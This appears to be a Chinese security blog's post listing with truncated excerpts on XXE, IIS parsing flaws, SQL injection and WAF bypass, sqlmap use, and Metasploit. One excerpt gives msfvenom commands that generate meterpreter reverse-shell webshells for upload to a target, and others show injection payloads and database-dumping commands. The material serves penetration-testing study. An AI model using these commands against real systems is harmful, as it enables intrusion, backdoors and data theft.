- 博客(12)
- 资源 (1)
- 收藏
- 关注
转载 xxe的攻击及防御
xml文档的基础组成XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素; DTD实体DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。 实体又分为一般实体和参数实体1,一般实体的声明语法:<!ENTITY实体名 "实...
2018-06-30 15:11:56 6563 1
原创 中间件漏洞
IISIIS解析漏洞IIS6.0解析利用方法有两种:1:在IIS6.0下,分号,冒号后面的不被解析,也就是说wooyun.asp;123.jpg会被服务器看成是wooyun.asp 2:当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。 3.默认解析:在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为<?PHPfp...
2018-06-25 14:03:19 463
原创 MSF建立webshell后门,并监听端口建立session连接
一 建立反弹后门msfvenom -p php/meterpreter/reverse_tcpLHOST=192.168.2.146 LPORT=5555 R > test3.php 注:生成的反弹木马存放在当前用户home目录下;将生成的木马上传到目标机中,可以远程访问;windows下asp反弹木马:root@kali:~# msfvenom -p windows/meterpret...
2018-06-23 15:56:33 12787
原创 MSF运用外部module提权
1 将下载的module复制到/usr/share/metasploit-framework/modules/exploits/linux/ ; 2 useexploit/linux/telnet/AF_PACKET 3 showoptions 4 exploit 查看当前所有会话msf exploit(linux/telnet/AF_PACKET) > sessions -l 选择...
2018-06-23 15:55:35 1202
原创 宽字节注入
由于php中,转义函数的存在,导致在' 等字符前加转义字符\,即 \' 导致 ' 被转义,无法注入;但通过输入%df和函数执行添加的%5C,被合并成%df%5C。由于GBK是两字节,这个%df%5C被MYSQL识别为GBK。导致本应的%df\变成%df%5C。%df%5C在GBK编码中没有对应,所以被当成无效字符。 %DF’ :会被PHP当中的addslashes函数转义为“%DF\'”,“\”...
2018-06-23 15:54:28 319
转载 SQL注入&WAF绕过姿势
1.WAF过滤机制: 1.异常检测协议–拒绝不符合HTTP标准的请求; 2.增强的输入验证–代理和服务端的验证而不只是限于客户端验证; 3.白名单&黑名单机制–白名单适用于稳定的Web应用,黑名单适合处理已知问题; 4.基于规则和基于异常的保护–基于规则更多的依赖黑名单机制基于,基于异常根据系统异常更为灵活; 5.另外还有会话保护、Cookies保护、抗入侵规避技术、响应监视...
2018-06-23 15:54:02 451
原创 防止SQL注入:
1、转义:1.1对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换1.2转义函数 mysql_real_escape_string-->>>>该函数通过转义字符串,实现了过滤无效化(消毒)的功能,可以避免sql注入 addslashes--->>>addslashes— 使用反斜线引用字符串,返回字符串,该字符串为了数...
2018-06-23 15:52:29 573
原创 判断数据库类型
判断数据类型 and (select count(*)fromsysobjects)>0 判断SQLserver返回正常,可能为SqlServer 和mysql,错误可能为access;and(select count(*) from msysobjects)>0 判断ACCESS 返回不够权限就是ACCESS数据库; 在注...
2018-06-23 15:51:55 2333
原创 SQL注入常用查询语句
DB用户user() DB版本version()全局函数@@datadir、@@hostname @@VERSION、@@version_compile_os 当前库database()• ASCII转字符char()• 连接字符串CONCAT_WS(CHAR(32,58,32),user(),database(),version()) table_schema 数据库...
2018-06-23 15:50:17 2105
原创 SQL injection 判断语句
SQL injection 分为 number 和 char 型;区分方法:字符型的有引号引起来,且没有报错。 number型:通过 and 1=1正常and 1=2 不正常; char型:'报错1' and '1 正常1' and '0 错误 char型利用:' or '1(显示所有数据) 注释有两种方法,二、# 注释和 -- 注释 PS:在注释的时候一定要闭合好最后面加上--...
2018-06-23 15:49:42 173
原创 SQL Blind Injection
Blind Injection是什么:SQL注入过程中,SQL语句执行后,执行的数据不能回显到前端,此时我们需要使用一些特殊的方法进行判断或尝试,这个过程称为盲注; 类型基于bool 型:应用程序仅仅根据执行的sql语句返回True(页面)和False(页面); 基于时间型:所以我们利用函数来判断页面是否发生延迟 ,来判断是否发生注入,如果延迟,则执行失败。类似搜索这类请求,boolean注入也无...
2018-06-23 15:48:42 3161
原创 SQLmap基本使用
一、基本使用 判断是否存在注入点-u"url" --batch 获取全部数据库 -u "url" --dbs --batch 获取当前数据库 -u "url" --current-db --batc...
2018-06-23 15:47:34 188
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人